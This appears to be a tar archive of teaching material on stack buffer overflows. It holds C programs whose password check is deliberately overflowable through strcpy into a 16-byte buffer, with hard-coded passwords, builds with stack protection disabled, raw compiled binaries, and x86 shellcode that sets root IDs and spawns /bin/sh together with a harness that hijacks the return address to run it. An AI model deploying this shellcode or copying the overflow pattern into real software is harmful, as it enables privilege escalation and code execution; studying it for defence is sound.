auth_overflow10000700000567300056700000001515412027144627013665 0ustar seamonsfacultyELF4 4 (# 444444$(HHHDDPtd44Qtd/lib/ld-linux.so.2GNU GNU,jʠ ~No0 KA:)5 0H__gmon_start__libc.so.6_IO_stdin_usedstrcpyexitputsprintfstrcmp__libc_start_mainGLIBC_2.0ii ZĘȘ̘SËt^[5%%h%h%h%h%Ęh %Șh(%̘h01^PTRhhQVh f$ט-ԘwøtU$ԘÐt&Ԙ-ԘuútUD$$ԘÐ&=ԘuU|ԘfttU$ytU8EED$E$D$$E$ruED$,E$TuEEU}!E D$$50$dE $`t&$K$$h$~ $f.fUW1VSI l$0 a)t'D$8,$D$D$4D$9u߃[^_] fSÛ[brilligoutgrabeUsage: %s -=-=-=-=-=-=-=-=-=-=-=-=-=- Access Granted.-=-=-=-=-=-=-=-=-=-=-=-=-=- Access Denied.;0Lp`TzR|  @F J tx?;*2$"@`AB \ `xAB t 8,aAA CAN0HAA AA``  o< d 8܂ԂoooVfvGCC: (GNU) 4.7.0 20120507 (Red Hat 4.7.0-5) dIVDXint?*x_O r Ol\x k:O  O r% $ > $ >  I.?: ; 'I@B: ; I4: ; II !I/ Q' auth_overflow1.cgw"gugv=0gK=ؼlong long intpassword/users/faculty/seamons/aoe/tarfilemainlong long unsigned intunsigned charGNU C 4.7.0 20120507 (Red Hat 4.7.0-5) -m32 -mtune=generic -march=i686 -g -fno-stack-protectorpassword_bufferargvargcshort unsigned intcheck_authenticationshort intauth_overflow1.cauth_flagsizetype.symtab.strtab.shstrtab.interp.note.ABI-tag.note.gnu.build-id.gnu.hash.dynsym.dynstr.gnu.version.gnu.version_r.rel.dyn.rel.plt.init.text.fini.rodata.eh_frame_hdr.eh_frame.init_array.fini_array.jcr.dynamic.got.got.plt.data.bss.comment.debug_aranges.debug_info.debug_abbrev.debug_line.debug_str44#HH 1hh$Do N V<<d^oko z Ԃ ܂8 #@@D4(ИԘ0,  !0 / U;0 37 F"1 4Hh<Ԃ ܂  @  ИԘ  .  A` WԘf & 6H d zИ Ԙ` И  #@a PؘU \cԘo x t Ԙ  crtstuff.c__JCR_LIST__deregister_tm_clonesregister_tm_clones__do_global_dtors_auxcompleted.5732__do_global_dtors_aux_fini_array_entryframe_dummy__frame_dummy_init_array_entryauth_overflow1.c__FRAME_END____JCR_END____init_array_end_DYNAMIC__init_array_start_GLOBAL_OFFSET_TABLE___libc_csu_finistrcmp@@GLIBC_2.0_ITM_deregisterTMCloneTable__x86.get_pc_thunk.bxdata_startprintf@@GLIBC_2.0_edata_finistrcpy@@GLIBC_2.0check_authentication__data_startputs@@GLIBC_2.0__gmon_start__exit@@GLIBC_2.0__dso_handle_IO_stdin_used__libc_start_main@@GLIBC_2.0__libc_csu_init_end_start_fp_hw__bss_startmain_Jv_RegisterClasses__TMC_END___ITM_registerTMCloneTable_initauth_overflow1.c0000600000567300056700000000122412024675503014075 0ustar seamonsfaculty#include #include #include int check_authentication(char *password) { int auth_flag = 0; char password_buffer[16]; strcpy(password_buffer, password); if(strcmp(password_buffer, "brillig") == 0) auth_flag = 1; if(strcmp(password_buffer, "outgrabe") == 0) auth_flag = 1; return auth_flag; } int main(int argc, char *argv[]) { if(argc < 2) { printf("Usage: %s \n", argv[0]); exit(0); } if(check_authentication(argv[1])) { printf("\n-=-=-=-=-=-=-=-=-=-=-=-=-=-\n"); printf(" Access Granted.\n"); printf("-=-=-=-=-=-=-=-=-=-=-=-=-=-\n"); } else { printf("\nAccess Denied.\n"); } } auth_overflow2.c0000600000567300056700000000122412024675503014076 0ustar seamonsfaculty#include #include #include int check_authentication(char *password) { char password_buffer[16]; int auth_flag = 0; strcpy(password_buffer, password); if(strcmp(password_buffer, "brillig") == 0) auth_flag = 1; if(strcmp(password_buffer, "outgrabe") == 0) auth_flag = 1; return auth_flag; } int main(int argc, char *argv[]) { if(argc < 2) { printf("Usage: %s \n", argv[0]); exit(0); } if(check_authentication(argv[1])) { printf("\n-=-=-=-=-=-=-=-=-=-=-=-=-=-\n"); printf(" Access Granted.\n"); printf("-=-=-=-=-=-=-=-=-=-=-=-=-=-\n"); } else { printf("\nAccess Denied.\n"); } } auth_overflow30000700000567300056700000001514412024714754013667 0ustar seamonsfacultyELF4x 4 (# 444444$(HHHDDPtd44Qtd/lib/ld-linux.so.2GNU GNU!"{Z𞀞?jb-h KA:)5 0H __gmon_start__libc.so.6_IO_stdin_usedstrcpyexitputsprintfstrcmp__libc_start_mainGLIBC_2.0ii ZS{t^[5%%h%h%h%h%h %h(%h01^PTRhhQVhf$ǘ-ĘwøtU$ĘÐt&Ę-ĘuútUD$$ĘÐ&=ĘuU|ĘfttU$ytU8EED$E$D$E$rtD$E$[uU}!E D$$%5$iE $et&$;)$X$n $ÐUW1VSY l$0 q)t'D$8,$D$D$4D$9u߃[^_] fSÛ[brilligoutgrabeUsage: %s -=-=-=-=-=-=-=-=-=-=-=-=-=- Access Granted.-=-=-=-=-=-=-=-=-=-=-=-=-=- Access Denied.;0LpkTzR|  PF J tx?;*2$"@[AB W `xAB t 8,aAA CAN0HAA AA``  o< d 8܂ԂoooVfvGCC: (GNU) 4.7.0 20120507 (Red Hat 4.7.0-5) :ZgUiintP*xpOru\ Olx kKO O r% $ > $ >  I.?: ; 'I@B: ; I4: ; II !I/ Y' auth_overflow3.chv"g-LvY0gK=ؼlong long intpassword/users/faculty/seamons/aoe/tarfileauth_overflow3.cmainlong long unsigned intunsigned charpassword_bufferargvargcshort unsigned intcheck_authenticationshort intGNU C 4.7.0 20120507 (Red Hat 4.7.0-5) -m32 -mtune=generic -march=i686 -g -fno-stack-protectorauth_flagsizetype.symtab.strtab.shstrtab.interp.note.ABI-tag.note.gnu.build-id.gnu.hash.dynsym.dynstr.gnu.version.gnu.version_r.rel.dyn.rel.plt.init.text.fini.rodata.eh_frame_hdr.eh_frame.init_array.fini_array.jcr.dynamic.got.got.plt.data.bss.comment.debug_aranges.debug_info.debug_abbrev.debug_line.debug_str44#HH 1hh$Do N V<<d^oko z Ԃ ܂8 #@@44І(Ę0,  ! / ];0 3/ F"1 4Hh<Ԃ ܂  @  ІĘ  .  A` WĘf & 6H d z Ę[   #@a PȘU \cĘox t Ę  crtstuff.c__JCR_LIST__deregister_tm_clonesregister_tm_clones__do_global_dtors_auxcompleted.5732__do_global_dtors_aux_fini_array_entryframe_dummy__frame_dummy_init_array_entryauth_overflow3.c__FRAME_END____JCR_END____init_array_end_DYNAMIC__init_array_start_GLOBAL_OFFSET_TABLE___libc_csu_finistrcmp@@GLIBC_2.0_ITM_deregisterTMCloneTable__x86.get_pc_thunk.bxdata_startprintf@@GLIBC_2.0_edata_finistrcpy@@GLIBC_2.0check_authentication__data_startputs@@GLIBC_2.0__gmon_start__exit@@GLIBC_2.0__dso_handle_IO_stdin_used__libc_start_main@@GLIBC_2.0__libc_csu_init_end_start_fp_hw__bss_startmain_Jv_RegisterClasses__TMC_END___ITM_registerTMCloneTable_initauth_overflow3.c0000600000567300056700000000120712024675503014100 0ustar seamonsfaculty#include #include #include int check_authentication(char *password) { char password_buffer[16]; int auth_flag = 0; strcpy(password_buffer, password); if((strcmp(password_buffer, "brillig") == 0) || (strcmp(password_buffer, "outgrabe") == 0)) return 1; else return 0; } int main(int argc, char *argv[]) { if(argc < 2) { printf("Usage: %s \n", argv[0]); exit(0); } if(check_authentication(argv[1])) { printf("\n-=-=-=-=-=-=-=-=-=-=-=-=-=-\n"); printf(" Access Granted.\n"); printf("-=-=-=-=-=-=-=-=-=-=-=-=-=-\n"); } else { printf("\nAccess Denied.\n"); } } auth_overflow3x0000700000567300056700000001521512027113621014043 0ustar seamonsfacultyELF4 4 (# 444444ėė$(ЗЗHHHDDPtd44Qtd/lib/ld-linux.so.2GNU GNUʷ!p8lBkT KA:)5 0H,__gmon_start__libc.so.6_IO_stdin_usedstrcpyexitputsprintfstrcmp__libc_start_mainGLIBC_2.0ii ZȘ̘ИԘؘܘSßt^[5%Ę%Șh%̘h%Иh%Ԙh%ؘh %ܘh(%h01^PTRhhQVhf$-wøtU$Ðt&-uútUD$$Ð&=uU|f̗ttU$̗ytU8EED$$4ED$E$D$8E$_tD$@E$HuU}!E D$$I"$VE $Rt&$_$| $ $f.@UW1VS9l$0 Q)t'D$8,$D$D$4D$9u߃[^_] fSß[%p brilligoutgrabeUsage: %s -=-=-=-=-=-=-=-=-=-=-=-=-=- Access Granted.-=-=-=-=-=-=-=-=-=-=-=-=-=- Access Denied.;0LpZPzR|  ,F J tx?;*2$"@tnAB j `xAB t 8(aAA CAN0HAA AA\`  ėȗo< d 8܂ԂoooЗVfvGCC: (GNU) 4.7.0 20120507 (Red Hat 4.7.0-5) IV~DXint?+x_Ord`!O\x k:O yOt r% $ > $ >  I.?: ; 'I@B: ; I4: ; II !I/ \( auth_overflow3x.chv0"g-LvY0gK=ؼlong long intpassword/users/faculty/seamons/aoe/tarfilemainlong long unsigned intunsigned charpassword_bufferargvargcshort unsigned intcheck_authenticationshort intauth_overflow3x.cGNU C 4.7.0 20120507 (Red Hat 4.7.0-5) -m32 -mtune=generic -march=i686 -g -fno-stack-protectorauth_flagsizetype.symtab.strtab.shstrtab.interp.note.ABI-tag.note.gnu.build-id.gnu.hash.dynsym.dynstr.gnu.version.gnu.version_r.rel.dyn.rel.plt.init.text.fini.rodata.eh_frame_hdr.eh_frame.init_array.fini_array.jcr.dynamic.got.got.plt.data.bss.comment.debug_aranges.debug_info.debug_abbrev.debug_line.debug_str44#HH 1hh$Do N V<<d^oko z Ԃ ܂8 #@@T((4ėȗ̗З(0, 4 !D / `;0# 4W F"1 4Hh<Ԃ ܂  @  (ėȗ̗З ̗ .  A` Wfȗ ė̗ȗЗė' 7I e { n  0,$Aa QV ](dpx u   crtstuff.c__JCR_LIST__deregister_tm_clonesregister_tm_clones__do_global_dtors_auxcompleted.5732__do_global_dtors_aux_fini_array_entryframe_dummy__frame_dummy_init_array_entryauth_overflow3x.c__FRAME_END____JCR_END____init_array_end_DYNAMIC__init_array_start_GLOBAL_OFFSET_TABLE___libc_csu_finistrcmp@@GLIBC_2.0_ITM_deregisterTMCloneTable__x86.get_pc_thunk.bxdata_startprintf@@GLIBC_2.0_edata_finistrcpy@@GLIBC_2.0check_authentication__data_startputs@@GLIBC_2.0__gmon_start__exit@@GLIBC_2.0__dso_handle_IO_stdin_used__libc_start_main@@GLIBC_2.0__libc_csu_init_end_start_fp_hw__bss_startmain_Jv_RegisterClasses__TMC_END___ITM_registerTMCloneTable_initauth_overflow3x.c0000600000567300056700000000124312027113601014255 0ustar seamonsfaculty#include #include #include int check_authentication(char *password) { char password_buffer[16]; int auth_flag = 0; printf("%p\n",&auth_flag); strcpy(password_buffer, password); if((strcmp(password_buffer, "brillig") == 0) || (strcmp(password_buffer, "outgrabe") == 0)) return 1; else return 0; } int main(int argc, char *argv[]) { if(argc < 2) { printf("Usage: %s \n", argv[0]); exit(0); } if(check_authentication(argv[1])) { printf("\n-=-=-=-=-=-=-=-=-=-=-=-=-=-\n"); printf(" Access Granted.\n"); printf("-=-=-=-=-=-=-=-=-=-=-=-=-=-\n"); } else { printf("\nAccess Denied.\n"); } } compiler-flags0000600000567300056700000000006112024675606013615 0ustar seamonsfacultygcc -g -m32 -fno-stack-protector -z execstack -o shellcode50000700000567300056700000001312712425742443012747 0ustar seamonsfacultyELFЂ4 4 (# 444444PPPPPTX\\\HHHDDPtdttt,,Qtd/lib/ld-linux.so.2GNU GNU{ѻD0_$ u K )l__gmon_start__libc.so.6_IO_stdin_used__libc_start_mainGLIBC_2.0ii ;DTXSwt[5L%P%Th%Xh1^PTRhPhQVhf$-wøtU$Ðt&-uútUD$$Ð&=uU|fXttU$XytUEEEfUW1VS ]l$0 q)t'D$8,$D$D$4D$9u߃[^_] fS[;(,DHhlzR|  0F J tx?;*2$"@AB W 8`aAA CAN0HAA AAp t TPTo E Hd\o<oo2\Ƃ111ə̀j XQh//shh/binQS̀GCC: (GNU) 4.7.0 20120507 (Red Hat 4.7.0-5). ׃M׃Mret TtintMqjj# $Z% .?: ; I@B4: ; I$ >  II!I/ $ >  4: ; I?9# shellcode5.cjsizetype/users/faculty/seamons/aoe/shellcodeGNU C 4.7.0 20120507 (Red Hat 4.7.0-5) -m32 -mtune=generic -march=i686 -g -fno-stack-protectorcharmainshellcode5.c.symtab.strtab.shstrtab.interp.note.ABI-tag.note.gnu.build-id.gnu.hash.dynsym.dynstr.gnu.version.gnu.version_r.rel.dyn.rel.plt.init.text.fini.rodata.eh_frame_hdr.eh_frame.init_array.fini_array.jcr.dynamic.got.got.plt.data.bss.comment.debug_aranges.debug_info.debug_abbrev.debug_line.debug_str44#HH 1hh$Do N @VE^o22ko<< z \\ dd tt#0ЂTThh tt,PPTTXX\\DDHH``D 0, !z/=;06Fp"1 O4Hh2<\ d t  Ђ ThtPTX\DH` X .0 Ap WfT PLXT\P H"P 2 N d` ovT|` pla Ђ h$   #/ It crtstuff.c__JCR_LIST__deregister_tm_clonesregister_tm_clones__do_global_dtors_auxcompleted.5732__do_global_dtors_aux_fini_array_entryframe_dummy__frame_dummy_init_array_entryshellcode5.c__FRAME_END____JCR_END____init_array_end_DYNAMIC__init_array_start_GLOBAL_OFFSET_TABLE___libc_csu_fini_ITM_deregisterTMCloneTable__x86.get_pc_thunk.bxdata_start_edata_fini__data_start__gmon_start____dso_handle_IO_stdin_used__libc_start_main@@GLIBC_2.0__libc_csu_init_end_start_fp_hwshellcode__bss_startmain_Jv_RegisterClasses__TMC_END___ITM_registerTMCloneTable_initshellcode5.bin0000700000567300056700000000004312024675534013510 0ustar seamonsfaculty111ə̀j XQh//shh/binQS̀shellcode5.c0000600000567300056700000000073412024675632013167 0ustar seamonsfaculty char shellcode[] = "\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68" "\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89" "\xe1\xcd\x80"; int main() { //main function int *ret; //ret pointer for manipulating saved return. ret = (int *)&ret + 2; //setret to point to the saved return //value on the stack. (*ret) = (int)shellcode; //change the saved return value to the //address of the shellcode, so it executes. } shellcode5nop.bin0000600000567300056700000000024412024675540014224 0ustar seamonsfaculty111ə̀j XQh//shh/binQS̀ checkstack0000700000567300056700000001521512425743305013021 0ustar seamonsfacultyELF4 4 (# 444444ėė$(ЗЗHHHDDPtd44Qtd/lib/ld-linux.so.2GNU GNUʷ!p8lBkT KA:)5 0H,__gmon_start__libc.so.6_IO_stdin_usedstrcpyexitputsprintfstrcmp__libc_start_mainGLIBC_2.0ii ZȘ̘ИԘؘܘSßt^[5%Ę%Șh%̘h%Иh%Ԙh%ؘh %ܘh(%h01^PTRhhQVhf$-wøtU$Ðt&-uútUD$$Ð&=uU|f̗ttU$̗ytU8EED$$4ED$E$D$8E$_tD$@E$HuU}!E D$$I"$VE $Rt&$_$| $ $f.@UW1VS9l$0 Q)t'D$8,$D$D$4D$9u߃[^_] fSß[%p brilligoutgrabeUsage: %s -=-=-=-=-=-=-=-=-=-=-=-=-=- Access Granted.-=-=-=-=-=-=-=-=-=-=-=-=-=- Access Denied.;0LpZPzR|  ,F J tx?;*2$"@tnAB j `xAB t 8(aAA CAN0HAA AA\`  ėȗo< d 8܂ԂoooЗVfvGCC: (GNU) 4.7.0 20120507 (Red Hat 4.7.0-5) IV~DXint?+x_Ord`!O\x k:O yOt r% $ > $ >  I.?: ; 'I@B: ; I4: ; II !I/ \( auth_overflow3x.chv0"g-LvY0gK=ؼlong long intpassword/users/faculty/seamons/aoe/tarfilemainlong long unsigned intunsigned charpassword_bufferargvargcshort unsigned intcheck_authenticationshort intauth_overflow3x.cGNU C 4.7.0 20120507 (Red Hat 4.7.0-5) -m32 -mtune=generic -march=i686 -g -fno-stack-protectorauth_flagsizetype.symtab.strtab.shstrtab.interp.note.ABI-tag.note.gnu.build-id.gnu.hash.dynsym.dynstr.gnu.version.gnu.version_r.rel.dyn.rel.plt.init.text.fini.rodata.eh_frame_hdr.eh_frame.init_array.fini_array.jcr.dynamic.got.got.plt.data.bss.comment.debug_aranges.debug_info.debug_abbrev.debug_line.debug_str44#HH 1hh$Do N V<<d^oko z Ԃ ܂8 #@@T((4ėȗ̗З(0, 4 !D / `;0# 4W F"1 4Hh<Ԃ ܂  @  (ėȗ̗З ̗ .  A` Wfȗ ė̗ȗЗė' 7I e { n  0,$Aa QV ](dpx u   crtstuff.c__JCR_LIST__deregister_tm_clonesregister_tm_clones__do_global_dtors_auxcompleted.5732__do_global_dtors_aux_fini_array_entryframe_dummy__frame_dummy_init_array_entryauth_overflow3x.c__FRAME_END____JCR_END____init_array_end_DYNAMIC__init_array_start_GLOBAL_OFFSET_TABLE___libc_csu_finistrcmp@@GLIBC_2.0_ITM_deregisterTMCloneTable__x86.get_pc_thunk.bxdata_startprintf@@GLIBC_2.0_edata_finistrcpy@@GLIBC_2.0check_authentication__data_startputs@@GLIBC_2.0__gmon_start__exit@@GLIBC_2.0__dso_handle_IO_stdin_used__libc_start_main@@GLIBC_2.0__libc_csu_init_end_start_fp_hw__bss_startmain_Jv_RegisterClasses__TMC_END___ITM_registerTMCloneTable_init